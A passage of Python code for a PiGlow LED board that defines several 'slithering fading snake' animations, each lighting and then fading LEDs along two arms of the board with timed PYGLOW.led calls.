sleep(sleep_speed)
# Turn on Snake Body 9
PYGLOW.led(15, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 8
PYGLOW.led(1, 30)
sleep(sleep_speed)
PYGLOW.led(2, 40)
sleep(sleep_speed)
PYGLOW.led(3, 50)
sleep(sleep_speed)
PYGLOW.led(4, 60)
sleep(sleep_speed)
PYGLOW.led(5, 70)
sleep(sleep_speed)
PYGLOW.led(12, 80)
sleep(sleep_speed)
PYGLOW.led(18, 90)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 110)
sleep(sleep_speed)
# Turn on Snake Body 10
PYGLOW.led(14, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 9
PYGLOW.led(1, 20)
sleep(sleep_speed)
PYGLOW.led(2, 30)
sleep(sleep_speed)
PYGLOW.led(3, 40)
sleep(sleep_speed)
PYGLOW.led(4, 50)
sleep(sleep_speed)
PYGLOW.led(5, 60)
sleep(sleep_speed)
PYGLOW.led(12, 70)
sleep(sleep_speed)
PYGLOW.led(18, 80)
sleep(sleep_speed)
PYGLOW.led(17, 90)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 110)
sleep(sleep_speed)
# Turn on Snake Tail
PYGLOW.led(13, 120)
sleep(sleep_speed)
# Fade Head, Body 1 - 10
PYGLOW.led(1, 10)
sleep(sleep_speed)
PYGLOW.led(2, 20)
sleep(sleep_speed)
PYGLOW.led(3, 30)
sleep(sleep_speed)
PYGLOW.led(4, 40)
sleep(sleep_speed)
PYGLOW.led(5, 50)
sleep(sleep_speed)
PYGLOW.led(12, 60)
sleep(sleep_speed)
PYGLOW.led(18, 70)
sleep(sleep_speed)
PYGLOW.led(17, 80)
sleep(sleep_speed)
PYGLOW.led(16, 90)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 110)
sleep(sleep_speed)
# Fade Head, Body 1 - 10, Tail
PYGLOW.led(1, 0)
sleep(sleep_speed)
PYGLOW.led(2, 10)
sleep(sleep_speed)
PYGLOW.led(3, 20)
sleep(sleep_speed)
PYGLOW.led(4, 30)
sleep(sleep_speed)
PYGLOW.led(5, 40)
sleep(sleep_speed)
PYGLOW.led(12, 50)
sleep(sleep_speed)
PYGLOW.led(18, 60)
sleep(sleep_speed)
PYGLOW.led(17, 70)
sleep(sleep_speed)
PYGLOW.led(16, 80)
sleep(sleep_speed)
PYGLOW.led(15, 90)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 110)
sleep(sleep_speed)
# Fade Body 1 - 10, Tail
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(3, 10)
sleep(sleep_speed)
PYGLOW.led(4, 20)
sleep(sleep_speed)
PYGLOW.led(5, 30)
sleep(sleep_speed)
PYGLOW.led(12, 40)
sleep(sleep_speed)
PYGLOW.led(18, 50)
sleep(sleep_speed)
PYGLOW.led(17, 60)
sleep(sleep_speed)
PYGLOW.led(16, 70)
sleep(sleep_speed)
PYGLOW.led(15, 80)
sleep(sleep_speed)
PYGLOW.led(14, 90)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Fade Body 2 - 10, Tail
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(4, 10)
sleep(sleep_speed)
PYGLOW.led(5, 20)
sleep(sleep_speed)
PYGLOW.led(12, 30)
sleep(sleep_speed)
PYGLOW.led(18, 40)
sleep(sleep_speed)
PYGLOW.led(17, 50)
sleep(sleep_speed)
PYGLOW.led(16, 60)
sleep(sleep_speed)
PYGLOW.led(15, 70)
sleep(sleep_speed)
PYGLOW.led(14, 80)
sleep(sleep_speed)
PYGLOW.led(13, 90)
sleep(sleep_speed)
# Fade Body 3 - 10, Tail
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(5, 10)
sleep(sleep_speed)
PYGLOW.led(12, 20)
sleep(sleep_speed)
PYGLOW.led(18, 30)
sleep(sleep_speed)
PYGLOW.led(17, 40)
sleep(sleep_speed)
PYGLOW.led(16, 50)
sleep(sleep_speed)
PYGLOW.led(15, 60)
sleep(sleep_speed)
PYGLOW.led(14, 70)
sleep(sleep_speed)
PYGLOW.led(13, 80)
sleep(sleep_speed)
# Fade Body 4 - 10, Tail
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(12, 10)
sleep(sleep_speed)
PYGLOW.led(18, 20)
sleep(sleep_speed)
PYGLOW.led(17, 30)
sleep(sleep_speed)
PYGLOW.led(16, 40)
sleep(sleep_speed)
PYGLOW.led(15, 50)
sleep(sleep_speed)
PYGLOW.led(14, 60)
sleep(sleep_speed)
PYGLOW.led(13, 70)
sleep(sleep_speed)
# Fade Body 5 - 10, Tail
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(18, 10)
sleep(sleep_speed)
PYGLOW.led(17, 20)
sleep(sleep_speed)
PYGLOW.led(16, 30)
sleep(sleep_speed)
PYGLOW.led(15, 40)
sleep(sleep_speed)
PYGLOW.led(14, 50)
sleep(sleep_speed)
PYGLOW.led(13, 60)
sleep(sleep_speed)
# Fade Body 6 - 10, Tail
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(17, 10)
sleep(sleep_speed)
PYGLOW.led(16, 20)
sleep(sleep_speed)
PYGLOW.led(15, 30)
sleep(sleep_speed)
PYGLOW.led(14, 40)
sleep(sleep_speed)
PYGLOW.led(13, 50)
sleep(sleep_speed)
# Fade Body 7 - 10, Tail
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(16, 10)
sleep(sleep_speed)
PYGLOW.led(15, 20)
sleep(sleep_speed)
PYGLOW.led(14, 30)
sleep(sleep_speed)
PYGLOW.led(13, 40)
sleep(sleep_speed)
# Fade Body 8 - 10, Tail
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(15, 10)
sleep(sleep_speed)
PYGLOW.led(14, 20)
sleep(sleep_speed)
PYGLOW.led(13, 30)
sleep(sleep_speed)
# Fade Body 9 - 10, Tail
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(14, 10)
sleep(sleep_speed)
PYGLOW.led(13, 20)
sleep(sleep_speed)
# Fade Body 10 and Tail
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(13, 10)
sleep(sleep_speed)
# Fade Tail
PYGLOW.led(13, 0)
sleep(sleep_speed)
def slithering_fading_snake_21():
"""
Lights up then fades the LEDs on arms 2 and 1
"""
LOGGER.debug("SLITHERING FADING SNAKE 21")
sleep_speed = 0.01
# Turn on Snake Head
PYGLOW.led(7, 120)
sleep(sleep_speed)
# Turn on Snake Body 1
PYGLOW.led(8, 120)
sleep(sleep_speed)
# Fade Head
PYGLOW.led(7, 110)
sleep(sleep_speed)
# Turn on Snake Body 2
PYGLOW.led(9, 120)
sleep(sleep_speed)
# Fade Head and Body 1
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 110)
sleep(sleep_speed)
# Turn on Snake Body 3
PYGLOW.led(10, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 2
PYGLOW.led(7, 90)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 110)
sleep(sleep_speed)
# Turn on Snake Body 4
PYGLOW.led(11, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 3
PYGLOW.led(7, 80)
sleep(sleep_speed)
PYGLOW.led(8, 90)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 110)
sleep(sleep_speed)
# Turn on Snake Body 5
PYGLOW.led(18, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 4
PYGLOW.led(7, 70)
sleep(sleep_speed)
PYGLOW.led(8, 80)
sleep(sleep_speed)
PYGLOW.led(9, 90)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 110)
sleep(sleep_speed)
# Turn on Snake Body 6
PYGLOW.led(6, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 5
PYGLOW.led(7, 60)
sleep(sleep_speed)
PYGLOW.led(8, 70)
sleep(sleep_speed)
PYGLOW.led(9, 80)
sleep(sleep_speed)
PYGLOW.led(10, 90)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(18, 110)
sleep(sleep_speed)
# Turn on Snake Body 7
PYGLOW.led(5, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 6
PYGLOW.led(7, 50)
sleep(sleep_speed)
PYGLOW.led(8, 60)
sleep(sleep_speed)
PYGLOW.led(9, 70)
sleep(sleep_speed)
PYGLOW.led(10, 80)
sleep(sleep_speed)
PYGLOW.led(11, 90)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(6, 110)
sleep(sleep_speed)
# Turn on Snake Body 8
PYGLOW.led(4, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 7
PYGLOW.led(7, 40)
sleep(sleep_speed)
PYGLOW.led(8, 50)
sleep(sleep_speed)
PYGLOW.led(9, 60)
sleep(sleep_speed)
PYGLOW.led(10, 70)
sleep(sleep_speed)
PYGLOW.led(11, 80)
sleep(sleep_speed)
PYGLOW.led(18, 90)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(5, 110)
sleep(sleep_speed)
# Turn on Snake Body 9
PYGLOW.led(3, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 8
PYGLOW.led(7, 30)
sleep(sleep_speed)
PYGLOW.led(8, 40)
sleep(sleep_speed)
PYGLOW.led(9, 50)
sleep(sleep_speed)
PYGLOW.led(10, 60)
sleep(sleep_speed)
PYGLOW.led(11, 70)
sleep(sleep_speed)
PYGLOW.led(18, 80)
sleep(sleep_speed)
PYGLOW.led(6, 90)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 110)
sleep(sleep_speed)
# Turn on Snake Body 10
PYGLOW.led(2, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 9
PYGLOW.led(7, 20)
sleep(sleep_speed)
PYGLOW.led(8, 30)
sleep(sleep_speed)
PYGLOW.led(9, 40)
sleep(sleep_speed)
PYGLOW.led(10, 50)
sleep(sleep_speed)
PYGLOW.led(11, 60)
sleep(sleep_speed)
PYGLOW.led(18, 70)
sleep(sleep_speed)
PYGLOW.led(6, 80)
sleep(sleep_speed)
PYGLOW.led(5, 90)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 110)
sleep(sleep_speed)
# Turn on Snake Tail
PYGLOW.led(1, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 10
PYGLOW.led(7, 10)
sleep(sleep_speed)
PYGLOW.led(8, 20)
sleep(sleep_speed)
PYGLOW.led(9, 30)
sleep(sleep_speed)
PYGLOW.led(10, 40)
sleep(sleep_speed)
PYGLOW.led(11, 50)
sleep(sleep_speed)
PYGLOW.led(18, 60)
sleep(sleep_speed)
PYGLOW.led(6, 70)
sleep(sleep_speed)
PYGLOW.led(5, 80)
sleep(sleep_speed)
PYGLOW.led(4, 90)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 110)
sleep(sleep_speed)
# Fade Head, Body 1 - 10, and Tail
PYGLOW.led(7, 0)
sleep(sleep_speed)
PYGLOW.led(8, 10)
sleep(sleep_speed)
PYGLOW.led(9, 20)
sleep(sleep_speed)
PYGLOW.led(10, 30)
sleep(sleep_speed)
PYGLOW.led(11, 40)
sleep(sleep_speed)
PYGLOW.led(18, 50)
sleep(sleep_speed)
PYGLOW.led(6, 60)
sleep(sleep_speed)
PYGLOW.led(5, 70)
sleep(sleep_speed)
PYGLOW.led(4, 80)
sleep(sleep_speed)
PYGLOW.led(3, 90)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 110)
sleep(sleep_speed)
# Fade Body 1 - 10 and Tail
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(9, 10)
sleep(sleep_speed)
PYGLOW.led(10, 20)
sleep(sleep_speed)
PYGLOW.led(11, 30)
sleep(sleep_speed)
PYGLOW.led(18, 40)
sleep(sleep_speed)
PYGLOW.led(6, 50)
sleep(sleep_speed)
PYGLOW.led(5, 60)
sleep(sleep_speed)
PYGLOW.led(4, 70)
sleep(sleep_speed)
PYGLOW.led(3, 80)
sleep(sleep_speed)
PYGLOW.led(2, 90)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Fade Body 2 - 10 and Tail
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(10, 10)
sleep(sleep_speed)
PYGLOW.led(11, 20)
sleep(sleep_speed)
PYGLOW.led(18, 30)
sleep(sleep_speed)
PYGLOW.led(6, 40)
sleep(sleep_speed)
PYGLOW.led(5, 50)
sleep(sleep_speed)
PYGLOW.led(4, 60)
sleep(sleep_speed)
PYGLOW.led(3, 70)
sleep(sleep_speed)
PYGLOW.led(2, 80)
sleep(sleep_speed)
PYGLOW.led(1, 90)
sleep(sleep_speed)
# Fade Body 3 - 10 and Tail
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(11, 10)
sleep(sleep_speed)
PYGLOW.led(18, 20)
sleep(sleep_speed)
PYGLOW.led(6, 30)
sleep(sleep_speed)
PYGLOW.led(5, 40)
sleep(sleep_speed)
PYGLOW.led(4, 50)
sleep(sleep_speed)
PYGLOW.led(3, 60)
sleep(sleep_speed)
PYGLOW.led(2, 70)
sleep(sleep_speed)
PYGLOW.led(1, 80)
sleep(sleep_speed)
# Fade Body 4 - 10 and Tail
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(18, 10)
sleep(sleep_speed)
PYGLOW.led(6, 20)
sleep(sleep_speed)
PYGLOW.led(5, 30)
sleep(sleep_speed)
PYGLOW.led(4, 40)
sleep(sleep_speed)
PYGLOW.led(3, 50)
sleep(sleep_speed)
PYGLOW.led(2, 60)
sleep(sleep_speed)
PYGLOW.led(1, 70)
sleep(sleep_speed)
# Fade Body 5 - 10 and Tail
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(6, 10)
sleep(sleep_speed)
PYGLOW.led(5, 20)
sleep(sleep_speed)
PYGLOW.led(4, 30)
sleep(sleep_speed)
PYGLOW.led(3, 40)
sleep(sleep_speed)
PYGLOW.led(2, 50)
sleep(sleep_speed)
PYGLOW.led(1, 60)
sleep(sleep_speed)
# Fade Body 6 - 10 and Tail
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(5, 10)
sleep(sleep_speed)
PYGLOW.led(4, 20)
sleep(sleep_speed)
PYGLOW.led(3, 30)
sleep(sleep_speed)
PYGLOW.led(2, 40)
sleep(sleep_speed)
PYGLOW.led(1, 50)
sleep(sleep_speed)
# Fade Body 7 - 10 and Tail
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(4, 10)
sleep(sleep_speed)
PYGLOW.led(3, 20)
sleep(sleep_speed)
PYGLOW.led(2, 30)
sleep(sleep_speed)
PYGLOW.led(1, 40)
sleep(sleep_speed)
# Fade Body 8 - 10 and Tail
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(3, 10)
sleep(sleep_speed)
PYGLOW.led(2, 20)
sleep(sleep_speed)
PYGLOW.led(1, 30)
sleep(sleep_speed)
# Fade Body 9 - 10 and Tail
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(2, 10)
sleep(sleep_speed)
PYGLOW.led(1, 20)
sleep(sleep_speed)
# Fade Body 10 and Tail
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(1, 10)
sleep(sleep_speed)
# Fade Tail
PYGLOW.led(1, 0)
sleep(sleep_speed)
def slithering_fading_snake_23():
"""
Lights up then fades the LEDs on arms 2 and 3
"""
LOGGER.debug("SLITHERING FADING SNAKE 23")
sleep_speed = 0.01
# Turn on Snake Head
PYGLOW.led(7, 120)
sleep(sleep_speed)
# Turn on Snake Body 1
PYGLOW.led(8, 120)
sleep(sleep_speed)
# Fade Head
PYGLOW.led(7, 110)
sleep(sleep_speed)
# Turn on Snake Body 2
PYGLOW.led(9, 120)
sleep(sleep_speed)
# Fade Head and Body 1
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 110)
sleep(sleep_speed)
# Turn on Snake Body 3
PYGLOW.led(10, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 2
PYGLOW.led(7, 90)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 110)
sleep(sleep_speed)
# Turn on Snake Body 4
PYGLOW.led(11, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 3
PYGLOW.led(7, 80)
sleep(sleep_speed)
PYGLOW.led(8, 90)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 110)
sleep(sleep_speed)
# Turn on Snake Body 5
PYGLOW.led(12, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 4
PYGLOW.led(7, 70)
sleep(sleep_speed)
PYGLOW.led(8, 80)
sleep(sleep_speed)
PYGLOW.led(9, 90)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 110)
sleep(sleep_speed)
# Turn on Snake Body 6
PYGLOW.led(6, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 5
PYGLOW.led(7, 60)
sleep(sleep_speed)
PYGLOW.led(8, 70)
sleep(sleep_speed)
PYGLOW.led(9, 80)
sleep(sleep_speed)
PYGLOW.led(10, 90)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(12, 110)
sleep(sleep_speed)
# Turn on Snake Body 7
PYGLOW.led(17, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 6
PYGLOW.led(7, 50)
sleep(sleep_speed)
PYGLOW.led(8, 60)
sleep(sleep_speed)
PYGLOW.led(9, 70)
sleep(sleep_speed)
PYGLOW.led(10, 80)
sleep(sleep_speed)
PYGLOW.led(11, 90)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(6, 110)
sleep(sleep_speed)
# Turn on Snake Body 8
PYGLOW.led(16, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 7
PYGLOW.led(7, 40)
sleep(sleep_speed)
PYGLOW.led(8, 50)
sleep(sleep_speed)
PYGLOW.led(9, 60)
sleep(sleep_speed)
PYGLOW.led(10, 70)
sleep(sleep_speed)
PYGLOW.led(11, 80)
sleep(sleep_speed)
PYGLOW.led(12, 90)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(17, 110)
sleep(sleep_speed)
# Turn on Snake Body 9
PYGLOW.led(15, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 8
PYGLOW.led(7, 30)
sleep(sleep_speed)
PYGLOW.led(8, 40)
sleep(sleep_speed)
PYGLOW.led(9, 50)
sleep(sleep_speed)
PYGLOW.led(10, 60)
sleep(sleep_speed)
PYGLOW.led(11, 70)
sleep(sleep_speed)
PYGLOW.led(12, 80)
sleep(sleep_speed)
PYGLOW.led(6, 90)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 110)
sleep(sleep_speed)
# Turn on Snake Body 10
PYGLOW.led(14, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 9
PYGLOW.led(7, 20)
sleep(sleep_speed)
PYGLOW.led(8, 30)
sleep(sleep_speed)
PYGLOW.led(9, 40)
sleep(sleep_speed)
PYGLOW.led(10, 50)
sleep(sleep_speed)
PYGLOW.led(11, 60)
sleep(sleep_speed)
PYGLOW.led(12, 70)
sleep(sleep_speed)
PYGLOW.led(6, 80)
sleep(sleep_speed)
PYGLOW.led(17, 90)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 110)
sleep(sleep_speed)
# Turn on Snake Tail
PYGLOW.led(13, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 10
PYGLOW.led(7, 10)
sleep(sleep_speed)
PYGLOW.led(8, 20)
sleep(sleep_speed)
PYGLOW.led(9, 30)
sleep(sleep_speed)
PYGLOW.led(10, 40)
sleep(sleep_speed)
PYGLOW.led(11, 50)
sleep(sleep_speed)
PYGLOW.led(12, 60)
sleep(sleep_speed)
PYGLOW.led(6, 70)
sleep(sleep_speed)
PYGLOW.led(17, 80)
sleep(sleep_speed)
PYGLOW.led(16, 90)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 110)
sleep(sleep_speed)
# Fade Head, Body 1 - 10, and Tail
PYGLOW.led(7, 0)
sleep(sleep_speed)
PYGLOW.led(8, 10)
sleep(sleep_speed)
PYGLOW.led(9, 20)
sleep(sleep_speed)
PYGLOW.led(10, 30)
sleep(sleep_speed)
PYGLOW.led(11, 40)
sleep(sleep_speed)
PYGLOW.led(12, 50)
sleep(sleep_speed)
PYGLOW.led(6, 60)
sleep(sleep_speed)
PYGLOW.led(17, 70)
sleep(sleep_speed)
PYGLOW.led(16, 80)
sleep(sleep_speed)
PYGLOW.led(15, 90)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 110)
sleep(sleep_speed)
# Fade Body 1 - 10 and Tail
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(9, 10)
sleep(sleep_speed)
PYGLOW.led(10, 20)
sleep(sleep_speed)
PYGLOW.led(11, 30)
sleep(sleep_speed)
PYGLOW.led(12, 40)
sleep(sleep_speed)
PYGLOW.led(6, 50)
sleep(sleep_speed)
PYGLOW.led(17, 60)
sleep(sleep_speed)
PYGLOW.led(16, 70)
sleep(sleep_speed)
PYGLOW.led(15, 80)
sleep(sleep_speed)
PYGLOW.led(14, 90)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Fade Body 2 - 10 and Tail
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(10, 10)
sleep(sleep_speed)
PYGLOW.led(11, 20)
sleep(sleep_speed)
PYGLOW.led(12, 30)
sleep(sleep_speed)
PYGLOW.led(6, 40)
sleep(sleep_speed)
PYGLOW.led(17, 50)
sleep(sleep_speed)
PYGLOW.led(16, 60)
sleep(sleep_speed)
PYGLOW.led(15, 70)
sleep(sleep_speed)
PYGLOW.led(14, 80)
sleep(sleep_speed)
PYGLOW.led(13, 90)
sleep(sleep_speed)
# Fade Body 3 - 10 and Tail
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(11, 10)
sleep(sleep_speed)
PYGLOW.led(12, 20)
sleep(sleep_speed)
PYGLOW.led(6, 30)
sleep(sleep_speed)
PYGLOW.led(17, 40)
sleep(sleep_speed)
PYGLOW.led(16, 50)
sleep(sleep_speed)
PYGLOW.led(15, 60)
sleep(sleep_speed)
PYGLOW.led(14, 70)
sleep(sleep_speed)
PYGLOW.led(13, 80)
sleep(sleep_speed)
# Fade Body 4 - 10 and Tail
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(12, 10)
sleep(sleep_speed)
PYGLOW.led(6, 20)
sleep(sleep_speed)
PYGLOW.led(17, 30)
sleep(sleep_speed)
PYGLOW.led(16, 40)
sleep(sleep_speed)
PYGLOW.led(15, 50)
sleep(sleep_speed)
PYGLOW.led(14, 60)
sleep(sleep_speed)
PYGLOW.led(13, 70)
sleep(sleep_speed)
# Fade Body 5 - 10 and Tail
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(6, 10)
sleep(sleep_speed)
PYGLOW.led(17, 20)
sleep(sleep_speed)
PYGLOW.led(16, 30)
sleep(sleep_speed)
PYGLOW.led(15, 40)
sleep(sleep_speed)
PYGLOW.led(14, 50)
sleep(sleep_speed)
PYGLOW.led(13, 60)
sleep(sleep_speed)
# Fade Body 6 - 10 and Tail
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(17, 10)
sleep(sleep_speed)
PYGLOW.led(16, 20)
sleep(sleep_speed)
PYGLOW.led(15, 30)
sleep(sleep_speed)
PYGLOW.led(14, 40)
sleep(sleep_speed)
PYGLOW.led(13, 50)
sleep(sleep_speed)
# Fade Body 7 - 10 and Tail
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(16, 10)
sleep(sleep_speed)
PYGLOW.led(15, 20)
sleep(sleep_speed)
PYGLOW.led(14, 30)
sleep(sleep_speed)
PYGLOW.led(13, 40)
sleep(sleep_speed)
# Fade Body 8 - 10 and Tail
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(15, 10)
sleep(sleep_speed)
PYGLOW.led(14, 20)
sleep(sleep_speed)
PYGLOW.led(13, 30)
sleep(sleep_speed)
# Fade Body 9 - 10 and Tail
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(14, 10)
sleep(sleep_speed)
PYGLOW.led(13, 20)
sleep(sleep_speed)
# Fade Body 10 and Tail
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(13, 10)
sleep(sleep_speed)
# Fade Tail
PYGLOW.led(13, 0)
sleep(sleep_speed)
def slithering_fading_snake_31():
"""
Lights up then fades the LEDs on arms 3 and 1
"""
LOGGER.debug("SLITHERING FADING SNAKE 31")
sleep_speed = 0.01
# Turn on Snake Head
PYGLOW.led(13, 120)
sleep(sleep_speed)
# Turn on Snake Body 1
PYGLOW.led(14, 120)
sleep(sleep_speed)
# Fade Head
PYGLOW.led(13, 110)
sleep(sleep_speed)
# Turn on Snake Body 2
PYGLOW.led(15, 120)
sleep(sleep_speed)
# Fade Head and Body 1
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 110)
sleep(sleep_speed)
# Turn on Snake Body 3
PYGLOW.led(16, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 2
PYGLOW.led(13, 90)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 110)
sleep(sleep_speed)
# Turn on Snake Body 4
PYGLOW.led(17, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 3
PYGLOW.led(13, 80)
sleep(sleep_speed)
PYGLOW.led(14, 90)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 110)
sleep(sleep_speed)
# Turn on Snake Body 5
PYGLOW.led(18, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 4
PYGLOW.led(13, 70)
sleep(sleep_speed)
PYGLOW.led(14, 80)
sleep(sleep_speed)
PYGLOW.led(15, 90)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 110)
sleep(sleep_speed)
# Turn on Snake Body 6
PYGLOW.led(12, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 5
PYGLOW.led(13, 60)
sleep(sleep_speed)
PYGLOW.led(14, 70)
sleep(sleep_speed)
PYGLOW.led(15, 80)
sleep(sleep_speed)
PYGLOW.led(16, 90)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(18, 110)
sleep(sleep_speed)
# Turn on Snake Body 7
PYGLOW.led(5, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 6
PYGLOW.led(13, 50)
sleep(sleep_speed)
PYGLOW.led(14, 60)
sleep(sleep_speed)
PYGLOW.led(15, 70)
sleep(sleep_speed)
PYGLOW.led(16, 80)
sleep(sleep_speed)
PYGLOW.led(17, 90)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(12, 110)
sleep(sleep_speed)
# Turn on Snake Body 8
PYGLOW.led(4, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 7
PYGLOW.led(13, 40)
sleep(sleep_speed)
PYGLOW.led(14, 50)
sleep(sleep_speed)
PYGLOW.led(15, 60)
sleep(sleep_speed)
PYGLOW.led(16, 70)
sleep(sleep_speed)
PYGLOW.led(17, 80)
sleep(sleep_speed)
PYGLOW.led(18, 90)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(5, 110)
sleep(sleep_speed)
# Turn on Snake Body 9
PYGLOW.led(3, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 8
PYGLOW.led(13, 30)
sleep(sleep_speed)
PYGLOW.led(14, 40)
sleep(sleep_speed)
PYGLOW.led(15, 50)
sleep(sleep_speed)
PYGLOW.led(16, 60)
sleep(sleep_speed)
PYGLOW.led(17, 70)
sleep(sleep_speed)
PYGLOW.led(18, 80)
sleep(sleep_speed)
PYGLOW.led(12, 90)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 110)
sleep(sleep_speed)
# Turn on Snake Body 10
PYGLOW.led(2, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 9
PYGLOW.led(13, 20)
sleep(sleep_speed)
PYGLOW.led(14, 30)
sleep(sleep_speed)
PYGLOW.led(15, 40)
sleep(sleep_speed)
PYGLOW.led(16, 50)
sleep(sleep_speed)
PYGLOW.led(17, 60)
sleep(sleep_speed)
PYGLOW.led(18, 70)
sleep(sleep_speed)
PYGLOW.led(12, 80)
sleep(sleep_speed)
